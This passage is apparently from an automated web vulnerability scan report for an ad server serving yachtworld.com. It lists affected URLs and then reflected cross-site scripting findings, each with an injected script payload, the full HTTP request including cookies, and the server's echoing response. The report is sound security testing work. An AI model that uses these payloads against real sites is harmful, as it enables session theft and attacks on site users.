4.7. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

4.8. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

4.9. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

4.10. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

4.11. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/boatsearch.html/1268659347@Top1,Right1

4.12. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/homepage.html/1106895876@Right1,Position2

4.13. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/homepage.html/1707366322@Right1,Position2

4.14. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1248084167@Top1,Right1

4.15. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1304883875@Top1,Right1

4.16. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1401531553@Top1,Right1

4.17. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1590611172@Top1,Right1

4.18. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1984270322@Top1,Right1

4.19. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1209188999@Top1,Right1

4.20. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1573214004@Top1,Right1

4.21. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1673595005@Top1,Right1

4.22. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1960522682@Top1,Right1

4.23. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1976854735@Top1,Right1

4.24. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1206775208@Right1,Top1

4.25. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1

4.26. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1

4.27. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/198824290/Right1/Boats/galati2-yen-as/galati2-maritimo-sky.gif/7263485738303033424c73414270536c

4.28. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

4.29. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

4.30. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

4.31. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

4.32. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

4.33. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

4.34. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1166415081/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c

4.35. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1306972267/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c

4.36. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

4.37. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1813621051/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c

4.38. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

4.39. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/218394558/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-motoryacht-728.gif/7263485738303033424c73414270536c

4.40. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/406859034/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blk-sky.gif/7263485738303033424c73414270536c

4.41. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/616229800/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-harbor-728.gif/7263485738303033424c73414270536c

4.42. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/658221905/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c

4.43. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1040445805/Right1/Boats/byh10-ywmobile-yen-sr/yw-mobile-blk-en-sky.gif/7263485738303033424c73414270536c

4.44. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1125872364/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c

4.45. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1371771958/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

4.46. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1552147843/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c

4.47. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/2013449512/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

4.48. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/275086285/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-mtn-sky.gif/7263485738303033424c73414270536c

4.49. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/423429032/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

4.50. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/779597469/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

4.51. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/83419808/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-catamaran-sky.gif/7263485738303033424c73414270536c

4.52. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

4.53. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1042378034/Top1/default/empty.gif/7263485738303033424c73414270536c

4.54. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1072889542/Right1/default/empty.gif/7263485738303033424c73414270536c

4.55. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1205137974/Right1/default/empty.gif/7263485738303033424c73414270536c

4.56. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/400899855/Top1/default/empty.gif/7263485738303033424c73414270536c

5. Content type incorrectly stated

5.1. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

5.2. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

5.3. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

5.4. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

5.5. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

5.6. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

5.7. http://oasc05139.247realmedia.com/favicon.ico



1. Cross-site scripting (reflected)  next
There are 72 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 4]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d1c"><script>alert(1)</script>7ddeaabbb5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com38d1c"><script>alert(1)</script>7ddeaabbb5/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1719
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com38d1c"><script>alert(1)</script>7ddeaabbb5/en/boatsearch.html/L37/2132946542/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.2. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 532fe"%3b5e891126f34 was submitted in the REST URL parameter 4. This input was echoed as 532fe";5e891126f34 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com532fe"%3b5e891126f34/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1671
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...
MFlash_VERSION = "10";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com532fe";5e891126f34/en/boatsearch.html/L37/1369173287/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSM
...[SNIP]...

1.3. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98139"%3b9c318c88399 was submitted in the REST URL parameter 5. This input was echoed as 98139";9c318c88399 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en98139"%3b9c318c88399/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1671
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...
ash_VERSION = "10";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en98139";9c318c88399/boatsearch.html/L37/1686749021/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFla
...[SNIP]...

1.4. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19aed"><script>alert(1)</script>326fc6486f5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en19aed"><script>alert(1)</script>326fc6486f5/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1721
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en19aed"><script>alert(1)</script>326fc6486f5/boatsearch.html/L37/1152632271/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.5. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1331"-alert(1)-"68db9819057 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.htmlb1331"-alert(1)-"68db9819057/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1691
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...
= "10";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.htmlb1331"-alert(1)-"68db9819057/L37/1547535466/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + ""
...[SNIP]...

1.6. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec0d"><script>alert(1)</script>2878b6bfc1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html1ec0d"><script>alert(1)</script>2878b6bfc1/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1719
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...
